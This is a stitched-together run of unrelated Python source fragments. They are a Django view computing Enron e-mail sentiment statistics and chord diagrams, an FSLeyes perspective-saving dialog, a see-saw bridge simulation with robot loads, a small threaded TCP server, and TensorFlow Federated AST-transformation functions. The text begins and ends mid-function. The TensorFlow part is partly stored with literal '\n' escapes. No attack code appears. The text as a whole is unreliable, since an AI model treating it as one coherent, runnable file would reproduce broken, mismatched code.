    # One edge per (fromId, toId): count of mails + mean sentiment.
    df_links = df_chord.groupby(['fromId', 'toId']).agg({'date':'count', 'sentiment':'mean'})
    df_links = df_links.reset_index()[['fromId','toId', 'date', 'sentiment']]
    df_links.columns = ['source', 'target', 'value', 'sentiment']

    x = df_chord[['fromId', 'fromJobtitle']].drop_duplicates()
    x.columns = ['source', 'fromJobtitle']

    df_links = pd.merge(df_links, x, on="source")
    # NOTE(review): the two calls below return new frames that are discarded
    # (drop_duplicates/sort_values are not in-place) — kept as-is.
    df_links.drop_duplicates(subset='source')

    df_nodes = df_chord[['fromId','fromEmail', 'fromJobtitle']].drop_duplicates().reset_index(drop=True)
    df_nodes.columns = ['index', 'name', 'group']
    df_nodes.sort_values('name')
    # Node size = number of distinct correspondents, rescaled below.
    y = df_chord[['fromId', 'toId']].drop_duplicates().groupby(['fromId']).count().reset_index()
    y.columns = ['index', 'size']
    df_nodes = pd.merge(df_nodes, y, on='index')
    df_nodes['size'] = df_nodes['size']/3+8

    nodes = hv.Dataset(df_nodes, 'index')
    edge_df = df_links

    import seaborn as sns  # also improves the look of plots
    sns.set()  # set Seaborn defaults

    # Keep only edges with at least 5 messages.
    chord = hv.Chord((df_links, nodes)).select(value=(5, None))
    chord.opts(
        opts.Chord(cmap='Category20', edge_cmap='Category20', edge_color='sentiment',
                   labels='name', node_color='group', edge_alpha=0.8, edge_line_width=1.5))

    # Restrict the diagram to the requested person.
    final_chord = chord.select(index=person_id)

    plot = hv.render(final_chord, backend='bokeh')
    item_text = json.dumps(json_item(plot))
    return item_text
def individualInfo(request):
    """AJAX endpoint: all statistics for a single person.

    Expects ``person_id`` in POST and the dataset as the ``csv_data``
    upload.  Responds with three sections: all-time statistics, the same
    statistics restricted to the currently selected filters, and a chord
    diagram of the person's correspondence.  (A large commented-out
    matplotlib/IPython scratch block was removed; see VCS history.)
    """
    person_id = int(request.POST['person_id'])

    df_enron = pd.read_csv(request.FILES['csv_data'])
    # Unfiltered ("all time") statistics — a 17-tuple, see
    # getIndividualInfoInner for the field order.
    Person_ID_1, ID_mail, job_title, mails_send, mean_sentiment_send, min_sentiment_send, max_sentiment_send, mails_received, mean_sentiment_received, min_sentiment_received, max_sentiment_received, array_mails_sent, array_mails_received, p_most_received_emails, most_received_emails_nr, p_most_sent_emails, most_sent_emails_nr = getIndividualInfoInner(df_enron, person_id)

    # Same statistics over the filtered subset of the data.
    df_enron_tf = filter(request,df_enron)
    Person_ID_1_tf, ID_mail_tf, job_title_tf, mails_send_tf, mean_sentiment_send_tf, min_sentiment_send_tf, max_sentiment_send_tf, mails_received_tf, mean_sentiment_received_tf, min_sentiment_received_tf, max_sentiment_received_tf, array_mails_sent_tf, array_mails_received_tf, p_most_received_emails_tf, most_received_emails_nr_tf, p_most_sent_emails_tf, most_sent_emails_nr_tf = getIndividualInfoInner(df_enron_tf, person_id)

    chord = chordDiagram(person_id, df_enron)

    # Values are stringified for the front-end, except the two per-partner
    # count payloads which are already JSON strings.
    return JsonResponse({
        'meta': {
            'person_id': str(Person_ID_1),
            'mail_address': str(ID_mail),
            'job_title': str(job_title),
        },
        'all_time': {
            'mails_sent': str(mails_send),
            'min_sentiment_sent': str(min_sentiment_send),
            'mean_sentiment_sent': str(mean_sentiment_send),
            'max_sentiment_sent': str(max_sentiment_send),
            'array_mails_sent': array_mails_sent,
            'mails_received': str(mails_received),
            'min_sentiment_received': str(min_sentiment_received),
            'mean_sentiment_received': str(mean_sentiment_received),
            'max_sentiment_received': str(max_sentiment_received),
            'array_mails_received': array_mails_received,
            'person_most_emails_received' : str(p_most_received_emails),
            'number_received' : str(most_received_emails_nr),
            'person_most_emails_sent' : str(p_most_sent_emails),
            'number_sent' : str(most_sent_emails_nr),

        },
        'time_filtered': {
            'mails_sent': str(mails_send_tf),
            'min_sentiment_sent': str(min_sentiment_send_tf),
            'mean_sentiment_sent': str(mean_sentiment_send_tf),
            'max_sentiment_sent': str(max_sentiment_send_tf),
            'array_mails_sent': array_mails_sent_tf,
            'mails_received': str(mails_received_tf),
            'min_sentiment_received': str(min_sentiment_received_tf),
            'mean_sentiment_received': str(mean_sentiment_received_tf),
            'max_sentiment_received': str(max_sentiment_received_tf),
            'array_mails_received': array_mails_received_tf,
            'person_most_emails_received' : str(p_most_received_emails_tf),
            'number_received' : str(most_received_emails_nr_tf),
            'person_most_emails_sent' : str(p_most_sent_emails_tf),
            'number_sent' : str(most_sent_emails_nr_tf),
        },
        'chord': chord
    })
def getIndividualInfoInner(df_enron, person_id):
    """Compute e-mail statistics for one person from the Enron frame.

    Returns a 17-tuple:
      (person_id, own_email, job_title,
       mails_sent, mean/min/max sentiment sent,
       mails_received, mean/min/max sentiment received,
       per-recipient sent counts as JSON (or 'none'),
       per-sender received counts as JSON (or 'none'),
       id + count of the most frequent sender in the person's traffic,
       id + count of the most frequent recipient in the person's traffic)

    NOTE(review): assumes the person appears at least once as sender
    (``describe()['top']`` on an empty frame would fail) — behaviour kept
    from the original.
    """
    person_send = df_enron['fromId'] == person_id
    person_received = df_enron['toId'] == person_id
    df_sent = df_enron[person_send]

    # The most common sender address / job title over the person's own
    # mails is the person's address / title.
    ID_mail = df_sent[['fromEmail']].describe()['fromEmail']['top']
    job_title = df_sent[['fromJobtitle']].describe()['fromJobtitle']['top']

    mails_send = df_sent['sentiment'].count()
    mean_sentiment_send = df_sent['sentiment'].mean()
    min_sentiment_send = df_sent['sentiment'].min()
    max_sentiment_send = df_sent['sentiment'].max()

    df_received = df_enron[person_received]
    mails_received = df_received['sentiment'].count()
    mean_sentiment_received = df_received['sentiment'].mean()
    min_sentiment_received = df_received['sentiment'].min()
    max_sentiment_received = df_received['sentiment'].max()

    df_person = df_enron[person_send | person_received]

    # Busiest sender among all mails touching this person (includes the
    # person themselves — naming kept from the original API).
    top_sender = df_person.groupby(["fromId"])[["fromEmail"]].count().sort_values(
        by="fromEmail", ascending=False).iloc[[0]]
    person_with_most_received_emails = top_sender.index.values[0]
    nr_received_emails = top_sender.values[0][0]

    # Busiest recipient, symmetrically.
    top_recipient = df_person.groupby(["toId"])[["toEmail"]].count().sort_values(
        by="toEmail", ascending=False).iloc[[0]]
    person_with_most_sent_emails = top_recipient.index.values[0]
    nr_sent_emails = top_recipient.values[0][0]

    # Per-partner message counts, serialised for the front-end charts.
    # Kept best-effort: on any failure (e.g. empty group) fall back to
    # 'none'.  BUG FIX: the bare ``except:`` clauses (which also swallowed
    # SystemExit/KeyboardInterrupt) are narrowed to ``Exception``.
    emails_sent = 'none'
    try:
        emails_sent = df_sent.groupby('toId').describe()['fromId'][['count']].to_json()
    except Exception:
        pass
    emails_received = 'none'
    try:
        emails_received = df_received.groupby('fromId').describe()['toId'][['count']].to_json()
    except Exception:
        pass

    return (person_id, ID_mail, job_title, mails_send, mean_sentiment_send,
            min_sentiment_send, max_sentiment_send, mails_received,
            mean_sentiment_received, min_sentiment_received,
            max_sentiment_received, emails_sent, emails_received,
            person_with_most_received_emails, nr_received_emails,
            person_with_most_sent_emails, nr_sent_emails)
class SavePerspectiveAction(base.Action):
    """Action that stores the current :class:`.FSLeyesFrame` layout as a
    named perspective, so it can be restored at a later time.  See the
    :mod:`.perspectives` module.
    """

    def __init__(self, frame):
        """Create a ``SavePerspectiveAction`` for the given
        :class:`.FSLeyesFrame`.
        """
        self.__frame = frame
        base.Action.__init__(self, self.__savePerspective)

    def __savePerspective(self):
        """Prompt the user for a name, then save the current frame layout
        under that name via :func:`.perspectives.savePerspective`.
        """
        import wx

        builtin_names = list(perspectives.BUILT_IN_PERSPECTIVES.keys())
        saved_names = perspectives.getAllPerspectives()

        name = None
        while name is None:

            entry = wx.TextEntryDialog(
                self.__frame,
                message=strings.messages[self, 'enterName'])

            # Cancelled, or nothing entered - bail out without saving.
            if entry.ShowModal() != wx.ID_OK:
                return

            candidate = entry.GetValue()
            if candidate.strip() == '':
                return

            # Built-in perspective names may not be overridden.
            if candidate in builtin_names:
                warn = wx.MessageDialog(
                    self.__frame,
                    message=strings.messages[
                        self, 'nameIsBuiltIn'].format(candidate),
                    style=(wx.ICON_EXCLAMATION | wx.OK))
                warn.ShowModal()
                continue

            # Overwriting a previously saved perspective needs confirmation.
            if candidate in saved_names:
                confirm = wx.MessageDialog(
                    self.__frame,
                    message=strings.messages[
                        self, 'confirmOverwrite'].format(candidate),
                    style=(wx.ICON_QUESTION | wx.YES_NO | wx.NO_DEFAULT))

                if confirm.ShowModal() == wx.ID_NO:
                    continue

            name = candidate

        perspectives.savePerspective(self.__frame, name)

        self.__frame.refreshPerspectiveMenu()
class Bridge:
    """A see-saw bridge: a rigid beam pivoting on a central fulcrum whose
    tilt is driven by the gravity torque of the robots standing on it."""

    def __init__(self, length, moment):
        # length: beam length (m); moment: the beam's own moment of
        # inertia about the fulcrum (kg*m^2).
        self.length = length
        self.moment = moment
        self.angle = 0    # tilt angle (rad)
        self.vel = 0      # angular velocity (rad/s)
        self.acc = 0      # angular acceleration (rad/s^2)
        self.fulcrum = np.array([0, 0])
        self.bots = []
        self.tipped = False  # latched True once |angle| exceeds pi/2

    def add_robot(self, robot):
        """Register a Robot whose weight contributes torque while it is on
        the beam."""
        self.bots.append(robot)

    def next_frame(self, delta_time=0.05):
        """Advance the simulation by one time step.

        Each robot is updated first, then the net gravity torque and total
        inertia of the loaded beam are integrated: velocity explicitly,
        angle by the trapezoidal rule on the angular velocity.
        """
        last_acc = self.acc  # NOTE(review): kept but never used below
        last_vel = self.vel
        last_angle = self.angle

        total_torque = 0
        total_inertia = self.moment
        for i in self.bots:
            i.update(self.angle, self.vel, delta_time=delta_time)
            # Only robots still on the beam contribute torque and inertia.
            if abs(i.pos) < abs(self.length / 2):
                torque = g*i.mass*i.pos*cos(self.angle)
                total_torque += torque
                inertia = i.mass*i.pos**2
                total_inertia += inertia

        self.acc = total_torque / total_inertia
        self.vel = self.acc*delta_time+last_vel
        # Angle advances by the mean of old and new angular velocity.
        self.angle = .5*(self.vel+last_vel)*delta_time+last_angle

        if abs(self.angle) > pi/2:
            self.tipped = True

    def sim_time(self, time, delta_time=0.05):
        """Run the simulation for ``time`` seconds and return the recorded
        series (t, angle, vel, acc, pos of bot 0, pos of bot 1).

        NOTE(review): assumes at least two robots were added — bots[0] and
        bots[1] are indexed directly.  ``rvel`` is recorded but not
        returned.  Once tipped, state stops advancing but keeps being
        recorded.
        """
        t = []
        ang = []
        vel = []
        acc = []
        pos = []
        pos2 = []
        rvel = []
        for i in np.arange(0, time, delta_time):
            if not self.tipped:
                self.next_frame(delta_time)
            t.append(i)
            ang.append(self.angle)
            vel.append(self.vel)
            acc.append(self.acc)
            pos.append(self.bots[0].pos)
            pos2.append(self.bots[1].pos)
            rvel.append(self.bots[0].vel)
            # print(i, self.angle, self.vel, self.acc, self.bots[0].pos, sep='\t')

        return t, ang, vel, acc, pos, pos2

    def get_bots(self):
        """Return parallel lists of each robot's position and velocity."""
        pos = []
        vel = []

        for i in self.bots:
            pos.append(i.pos)
            vel.append(i.vel)

        return pos, vel
class Robot(ABC):
    """Abstract dynamic load riding on the bridge.

    Attributes:
        mass: mass (kg).
        pos:  position along the beam; origin at the fulcrum, right is
              positive (m).
        vel:  field-oriented velocity (m/s).
        acc:  field-oriented acceleration (m/s^2).
    """

    def __init__(self, mass, pos, vel, acc):
        self.mass = mass
        self.pos = pos
        self.vel = vel
        self.acc = acc

    def step_vel(self, new_vel, delta_time=0.05):
        """Jump to ``new_vel``, advancing position with the average of the
        old and new velocities (trapezoidal rule)."""
        self.pos += 0.5 * (self.vel + new_vel) * delta_time
        self.vel = new_vel

    def step_acc(self, new_acc, delta_time=0.05):
        """Apply ``new_acc`` for one step: update velocity explicitly, then
        advance position via :meth:`step_vel`."""
        self.acc = new_acc
        self.step_vel(self.vel + new_acc * delta_time, delta_time=delta_time)

    @abstractmethod
    def update(self, angle, vel, delta_time=.05):
        """Per-frame hook called by the bridge with its current state."""
# Minimal threaded TCP echo-style server: accept connections forever and
# hand each one to a worker thread.
HOST = socket.gethostbyname(socket.gethostname())  # this machine's LAN address
PORT = 4000

# "with" behaves like try/finally: the listening socket is closed on exit.
# socket(ADDRESS_FAMILY, SOCKET_TYPE)
#   AF_INET  (default): IPv4      AF_INET6:  IPv6
#   SOCK_STREAM (default): TCP    SOCK_DGRAM: UDP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
    print(f'Try to connect: {HOST}:{PORT}')

    # Bind the socket to (host, port) — the communication end point.
    tcp.bind((HOST, PORT))

    # Allow the system-maximum backlog of pending connections.
    tcp.listen(socket.SOMAXCONN)
    while True:
        # Block until a client connects; returns the per-client socket and
        # the client address.
        (conn, addr) = tcp.accept()

        # One thread per client; threaded.Thread is presumably the
        # project's per-connection handler (see the `threaded` module).
        threading.Thread(target=threaded.Thread, args=(conn,)).start()
# NOTE(review): unreachable after the infinite loop (and the socket is
# already closed by the `with` block) — kept from the original.
tcp.close()
tensorflow_federated.python.core.impl import transformation_utils\n\n\ndef extract_intrinsics(comp):\n r\"\"\"Extracts intrinsics to the scope which binds any variable it depends on.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n replaces the following computation containing a called intrinsic:\n\n ...\n \\\n Call\n / \\\n Intrinsic ...\n\n with the following computation containing a block with the extracted called\n intrinsic:\n\n Block\n / \\\n [x=Call] ...\n / \\ \\\n Intrinsic ... Ref(x)\n\n The called intrinsics are extracted to the scope which binds any variable the\n called intrinsic depends. If the called intrinsic is not bound by any\n computation in `comp` it will be extracted to the root. Both the\n `parameter_name` of a `computation_building_blocks.Lambda` and the name of any\n variable defined by a `computation_building_blocks.Block` can affect the scope\n in which a reference in called intrinsic is bound.\n\n NOTE: This function will also extract blocks to the scope in which they are\n bound because block variables can restrict the scope in which intrinsics are\n bound.\n\n Args:\n comp: The computation building block in which to perform the extractions.\n The names of lambda parameters and block variables in `comp` must be\n unique.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n ValueError: If `comp` contains variables with non-unique names.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n _check_has_unique_names(comp)\n name_generator = computation_constructing_utils.unique_name_generator(comp)\n unbound_references = _get_unbound_references(comp)\n\n def _contains_unbound_reference(comp, names):\n \"\"\"Returns `True` if `comp` contains unbound references to `names`.\n\n This function will update the non-local `unbound_references` captured from\n the parent context if 
`comp` is not contained in that collection. This can\n happen when new computations are created and added to the AST.\n\n Args:\n comp: The computation building block to test.\n names: A Python string or a list, tuple, or set of Python strings.\n \"\"\"\n if isinstance(names, six.string_types):\n names = (names,)\n if comp not in unbound_references:\n references = _get_unbound_references(comp)\n unbound_references.update(references)\n return any(n in unbound_references[comp] for n in names)\n\n def _is_called_intrinsic_or_block(comp):\n \"\"\"Returns `True` if `comp` is a called intrinsic or a block.\"\"\"\n return (_is_called_intrinsic(comp) or\n isinstance(comp, computation_building_blocks.Block))\n\n def _should_transform(comp):\n \"\"\"Returns `True` if `comp` should be transformed.\n\n The following `_extract_intrinsic_*` methods all depend on being invoked\n after `_should_transform` evaluates to `True` for a given `comp`. Because of\n this certain assumptions are made:\n\n * transformation functions will transform a given `comp`\n * block variables are guaranteed to not be empty\n\n Args:\n comp: The computation building block in which to test.\n \"\"\"\n if isinstance(comp, computation_building_blocks.Block):\n return (_is_called_intrinsic_or_block(comp.result) or any(\n isinstance(e, computation_building_blocks.Block)\n for _, e in comp.locals))\n elif isinstance(comp, computation_building_blocks.Call):\n return _is_called_intrinsic_or_block(comp.argument)\n elif isinstance(comp, computation_building_blocks.Lambda):\n if _is_called_intrinsic(comp.result):\n return True\n if isinstance(comp.result, computation_building_blocks.Block):\n for index, (_, variable) in enumerate(comp.result.locals):\n names = [n for n, _ in comp.result.locals[:index]]\n if (not _contains_unbound_reference(variable, comp.parameter_name) and\n not _contains_unbound_reference(variable, names)):\n return True\n elif isinstance(comp, computation_building_blocks.Selection):\n return 
_is_called_intrinsic_or_block(comp.source)\n elif isinstance(comp, computation_building_blocks.Tuple):\n return any(_is_called_intrinsic_or_block(e) for e in comp)\n return False\n\n def _extract_from_block(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.result):\n called_intrinsic = comp.result\n name = six.next(name_generator)\n variables = comp.locals\n variables.append((name, called_intrinsic))\n result = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n return computation_building_blocks.Block(variables, result)\n elif isinstance(comp.result, computation_building_blocks.Block):\n return computation_building_blocks.Block(comp.locals + comp.result.locals,\n comp.result.result)\n else:\n variables = []\n for name, variable in comp.locals:\n if isinstance(variable, computation_building_blocks.Block):\n variables.extend(variable.locals)\n variables.append((name, variable.result))\n else:\n variables.append((name, variable))\n return computation_building_blocks.Block(variables, comp.result)\n\n def _extract_from_call(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.argument):\n called_intrinsic = comp.argument\n name = six.next(name_generator)\n variables = ((name, called_intrinsic),)\n result = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n else:\n block = comp.argument\n variables = block.locals\n result = block.result\n call = computation_building_blocks.Call(comp.function, result)\n block = computation_building_blocks.Block(variables, call)\n return _extract_from_block(block)\n\n def _extract_from_lambda(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.result):\n called_intrinsic = comp.result\n name = six.next(name_generator)\n variables = ((name, called_intrinsic),)\n ref = computation_building_blocks.Reference(\n 
name, called_intrinsic.type_signature)\n if not _contains_unbound_reference(comp.result, comp.parameter_name):\n fn = computation_building_blocks.Lambda(comp.parameter_name,\n comp.parameter_type, ref)\n return computation_building_blocks.Block(variables, fn)\n else:\n block = computation_building_blocks.Block(variables, ref)\n return computation_building_blocks.Lambda(comp.parameter_name,\n comp.parameter_type, block)\n else:\n block = comp.result\n extracted_variables = []\n retained_variables = []\n for name, variable in block.locals:\n names = [n for n, _ in retained_variables]\n if (not _contains_unbound_reference(variable, comp.parameter_name) and\n not _contains_unbound_reference(variable, names)):\n extracted_variables.append((name, variable))\n else:\n retained_variables.append((name, variable))\n if retained_variables:\n result = computation_building_blocks.Block(retained_variables,\n block.result)\n else:\n result = block.result\n fn = computation_building_blocks.Lambda(comp.parameter_name,\n comp.parameter_type, result)\n block = computation_building_blocks.Block(extracted_variables, fn)\n return _extract_from_block(block)\n\n def _extract_from_selection(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.source):\n called_intrinsic = comp.source\n name = six.next(name_generator)\n variables = ((name, called_intrinsic),)\n result = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n else:\n block = comp.source\n variables = block.locals\n result = block.result\n selection = computation_building_blocks.Selection(\n result, name=comp.name, index=comp.index)\n block = computation_building_blocks.Block(variables, selection)\n return _extract_from_block(block)\n\n def _extract_from_tuple(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n variables = []\n elements = []\n for name, element in anonymous_tuple.to_elements(comp):\n if 
def inline_block_locals(comp, variable_names=None):
  """Inlines the block variables in `comp` whitelisted by `variable_names`.

  Args:
    comp: The computation building block in which to perform the inlining. The
      names of lambda parameters and block variables in `comp` must be unique.
    variable_names: A Python list, tuple, or set representing the whitelist of
      variable names to inline; or None if all variables should be inlined.

  Returns:
    A new computation with the transformation applied or the original `comp`.

  Raises:
    ValueError: If `comp` contains variables with non-unique names.
  """
  py_typecheck.check_type(comp,
                          computation_building_blocks.ComputationBuildingBlock)
  _check_has_unique_names(comp)
  if variable_names is not None:
    py_typecheck.check_type(variable_names, (list, tuple, set))

  def _is_whitelisted(name):
    # With no explicit whitelist, every variable is eligible for inlining.
    return variable_names is None or name in variable_names

  def _transform(comp, symbol_tree):
    """Returns a new transformed computation or `comp`."""
    if isinstance(comp, computation_building_blocks.Reference):
      if not _is_whitelisted(comp.name):
        return comp, False
      resolved = symbol_tree.get_payload_with_name(comp.name).value
      # A `None` payload identifies a variable bound by a Lambda as opposed to
      # a Block; lambda parameters are never inlined.
      if resolved is None:
        return comp, False
      return resolved, True
    if isinstance(comp, computation_building_blocks.Block):
      if not any(_is_whitelisted(name) for name, _ in comp.locals):
        return comp, False
      retained = [(name, value)
                  for name, value in comp.locals
                  if not _is_whitelisted(name)]
      if retained:
        return computation_building_blocks.Block(retained, comp.result), True
      # Every local was inlined away; the block collapses to its result.
      return comp.result, True
    return comp, False

  symbol_tree = transformation_utils.SymbolTree(
      transformation_utils.ReferenceCounter)
  return transformation_utils.transform_postorder_with_symbol_bindings(
      comp, _transform, symbol_tree)
Comp(x)\n\n Preserving the relative ordering of any locals declarations in a postorder\n walk, which therefore preserves scoping rules.\n\n Notice that because TFF Block constructs bind their variables in sequence, it\n is completely safe to add the locals lists together in this implementation,\n\n Args:\n comp: The computation building block in which to perform the merges.\n\n Returns:\n Transformed version of `comp` with its neighboring blocks merged.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Block) and\n isinstance(comp.result, computation_building_blocks.Block))\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = computation_building_blocks.Block(\n comp.locals + comp.result.locals, comp.result.result)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef merge_chained_federated_maps_or_applys(comp):\n r\"\"\"Merges all the chained federated maps or federated apply in `comp`.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n replaces the following computation containing two federated map intrinsics:\n\n Call\n / \\\n Intrinsic Tuple\n |\n [Comp(x), Call]\n / \\\n Intrinsic Tuple\n |\n [Comp(y), Comp(z)]\n\n intrinsic()>)\n\n with the following computation containing one federated map or apply\n intrinsic:\n\n\n Call\n / \\\n Intrinsic Tuple\n |\n [Block, Comp(z)]\n / \\\n [fn=Tuple] Lambda(arg)\n | \\\n [Comp(y), Comp(x)] Call\n / \\\n Sel(1) Call\n / / \\\n Ref(fn) Sel(0) Ref(arg)\n /\n Ref(fn)\n\n intrinsic(<(let fn= in (arg -> fn[1](fn[0](arg)))), z>)\n\n The functional computations `x` and `y`, and the argument `z` are retained;\n the other computations are replaced.\n\n Args:\n comp: The computation building block in which to perform the merges.\n\n Returns:\n A new computation 
with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n name_generator = computation_constructing_utils.unique_name_generator(comp)\n\n def _should_transform(comp):\n \"\"\"Returns `True` if `comp` is a chained federated map.\"\"\"\n if _is_called_intrinsic(comp, (\n intrinsic_defs.FEDERATED_APPLY.uri,\n intrinsic_defs.FEDERATED_MAP.uri,\n )):\n outer_arg = comp.argument[1]\n if _is_called_intrinsic(outer_arg, comp.function.uri):\n return True\n return False\n\n def _transform(comp):\n \"\"\"Returns a new transformed computation or `comp`.\"\"\"\n if not _should_transform(comp):\n return comp, False\n\n def _create_block_to_chained_calls(comps):\n r\"\"\"Constructs a transformed block computation from `comps`.\n\n Block\n / \\\n [fn=Tuple] Lambda(arg)\n | \\\n [Comp(y), Comp(x)] Call\n / \\\n Sel(1) Call\n / / \\\n Ref(fn) Sel(0) Ref(arg)\n /\n Ref(fn)\n\n (let fn= in (arg -> fn[1](fn[0](arg)))\n\n Args:\n comps: A Python list of computations.\n\n Returns:\n A `computation_building_blocks.Block`.\n \"\"\"\n functions = computation_building_blocks.Tuple(comps)\n functions_name = six.next(name_generator)\n functions_ref = computation_building_blocks.Reference(\n functions_name, functions.type_signature)\n arg_name = six.next(name_generator)\n arg_type = comps[0].type_signature.parameter\n arg_ref = computation_building_blocks.Reference(arg_name, arg_type)\n arg = arg_ref\n for index, _ in enumerate(comps):\n fn_sel = computation_building_blocks.Selection(\n functions_ref, index=index)\n call = computation_building_blocks.Call(fn_sel, arg)\n arg = call\n fn = computation_building_blocks.Lambda(arg_ref.name,\n arg_ref.type_signature, call)\n return computation_building_blocks.Block(\n ((functions_ref.name, functions),), fn)\n\n block = _create_block_to_chained_calls((\n comp.argument[1].argument[0],\n comp.argument[0],\n 
def merge_tuple_intrinsics(comp, uri):
  r"""Merges all the tuples of intrinsics in `comp` into one intrinsic.

  This transform traverses `comp` postorder and replaces a tuple of called
  intrinsics that all represent the same operation:

    <Intrinsic(<f1, v1>), Intrinsic(<f2, v2>), ...>

  with a single called intrinsic whose functional arguments are merged into
  one function of a zipped argument, and whose non-functional arguments are
  federated-zipped together:

    federated_unzip(Intrinsic(<
        (let fn=<f1, f2> in (arg -> <fn[0](arg[0]), fn[1](arg[1])>)),
        federated_zip(<v1, v2>),
    >))

  The functional computations `f1`, `f2`, etc..., and the computations `v1`,
  `v2`, etc... are retained; the other computations are replaced.

  NOTE: This is just an example of what this transformation would look like
  when applied to a tuple of federated maps. The components `f1`, `f2`, `v1`,
  and `v2` and the number of those components are not important.

  This transformation is implemented to match the following intrinsics:

  * intrinsic_defs.FEDERATED_AGGREGATE.uri
  * intrinsic_defs.FEDERATED_BROADCAST.uri
  * intrinsic_defs.FEDERATED_MAP.uri

  Args:
    comp: The computation building block in which to perform the merges.
    uri: The URI of the intrinsic to merge.

  Returns:
    A new computation with the transformation applied or the original `comp`.

  Raises:
    TypeError: If types do not match.
    ValueError: If `uri` is not one of the supported intrinsic URIs.
  """
  py_typecheck.check_type(comp,
                          computation_building_blocks.ComputationBuildingBlock)
  py_typecheck.check_type(uri, six.string_types)
  expected_uri = (
      intrinsic_defs.FEDERATED_AGGREGATE.uri,
      intrinsic_defs.FEDERATED_BROADCAST.uri,
      intrinsic_defs.FEDERATED_MAP.uri,
  )
  if uri not in expected_uri:
    # Fixed: error message previously read 'expected to be on of'.
    raise ValueError(
        'The value of `uri` is expected to be one of {}, found {}'.format(
            expected_uri, uri))
  name_generator = computation_constructing_utils.unique_name_generator(comp)

  def _should_transform(comp):
    # Only tuples whose elements are all calls to the same intrinsic as the
    # first element (which itself must match `uri`) are merged.
    return (isinstance(comp, computation_building_blocks.Tuple) and
            _is_called_intrinsic(comp[0], uri) and all(
                _is_called_intrinsic(element, comp[0].function.uri)
                for element in comp))

  def _transform_functional_args(comps):
    r"""Transforms the functional computations `comps`.

    Given a computation containing `n` called intrinsics with `m` arguments,
    this function constructs the following computation from the functional
    arguments of the called intrinsics:

      (let fn=<f1, f2, ...> in (arg -> <fn[0](arg[0]), fn[1](arg[1]), ...>))

    with one call for each of the `n` intrinsics. This computation represents
    one of the `m` arguments that should be passed to the call of the
    transformed computation.

    Args:
      comps: a Python list of computations.

    Returns:
      A `computation_building_blocks.Block`.
    """
    functions = computation_building_blocks.Tuple(comps)
    functions_name = six.next(name_generator)
    functions_ref = computation_building_blocks.Reference(
        functions_name, functions.type_signature)
    arg_name = six.next(name_generator)
    # The merged function takes a tuple of the original functions' parameters.
    arg_type = [element.type_signature.parameter for element in comps]
    arg_ref = computation_building_blocks.Reference(arg_name, arg_type)
    elements = []
    for index in range(len(comps)):
      sel_fn = computation_building_blocks.Selection(functions_ref, index=index)
      sel_arg = computation_building_blocks.Selection(arg_ref, index=index)
      call = computation_building_blocks.Call(sel_fn, sel_arg)
      elements.append(call)
    calls = computation_building_blocks.Tuple(elements)
    fn = computation_building_blocks.Lambda(arg_ref.name,
                                            arg_ref.type_signature, calls)
    return computation_building_blocks.Block(((functions_ref.name, functions),),
                                             fn)

  def _transform_non_functional_args(comps):
    r"""Transforms the non-functional computations `comps`.

    Given a computation containing `n` called intrinsics with `m` arguments,
    this function constructs one of the `m` arguments that should be passed to
    the call of the transformed computation: a federated zip of `comps` when
    the values are federated, otherwise a plain tuple of `comps`.

    Args:
      comps: A Python list of computations.

    Returns:
      A `computation_building_blocks.ComputationBuildingBlock`.
    """
    values = computation_building_blocks.Tuple(comps)
    first_comp = comps[0]
    if isinstance(first_comp.type_signature, computation_types.FederatedType):
      return computation_constructing_utils.create_federated_zip(values)
    else:
      return values

  def _transform_args(comp):
    """Transforms the arguments from `comp`.

    Given a computation containing a tuple of intrinsics that can be merged,
    this function constructs the following computation from the arguments of
    the called intrinsics:

      <Block, federated_zip(Tuple), ...>

    with one `computation_building_blocks.Block` for each functional
    computation in `m` and one called federated zip (or Tuple) for each
    non-functional computation in `m`. This list of computations represents
    the `m` arguments that should be passed to the call of the transformed
    computation.

    Args:
      comp: The computation building block in which to perform the merges.

    Returns:
      A `computation_building_blocks.ComputationBuildingBlock` representing
      the transformed arguments from `comp`.
    """
    first_comp = comp[0]
    if isinstance(first_comp.argument, computation_building_blocks.Tuple):
      # Transpose: gather the index-th argument of every call together.
      comps = [[] for _ in range(len(first_comp.argument))]
      for _, call in anonymous_tuple.to_elements(comp):
        for index, arg in enumerate(call.argument):
          comps[index].append(arg)
    else:
      comps = [[]]
      for _, call in anonymous_tuple.to_elements(comp):
        comps[0].append(call.argument)
    elements = []
    for args in comps:
      first_args = args[0]
      if isinstance(first_args.type_signature, computation_types.FunctionType):
        transformed_args = _transform_functional_args(args)
      else:
        transformed_args = _transform_non_functional_args(args)
      elements.append(transformed_args)
    if isinstance(first_comp.argument, computation_building_blocks.Tuple):
      return computation_building_blocks.Tuple(elements)
    else:
      return elements[0]

  def _transform(comp):
    """Returns a new transformed computation or `comp`."""
    if not _should_transform(comp):
      return comp, False
    arg = _transform_args(comp)
    first_comp = comp[0]
    named_comps = anonymous_tuple.to_elements(comp)
    parameter_type = computation_types.to_type(arg.type_signature)
    type_signature = [call.type_signature.member for _, call in named_comps]
    result_type = computation_types.FederatedType(
        type_signature, first_comp.type_signature.placement,
        first_comp.type_signature.all_equal)
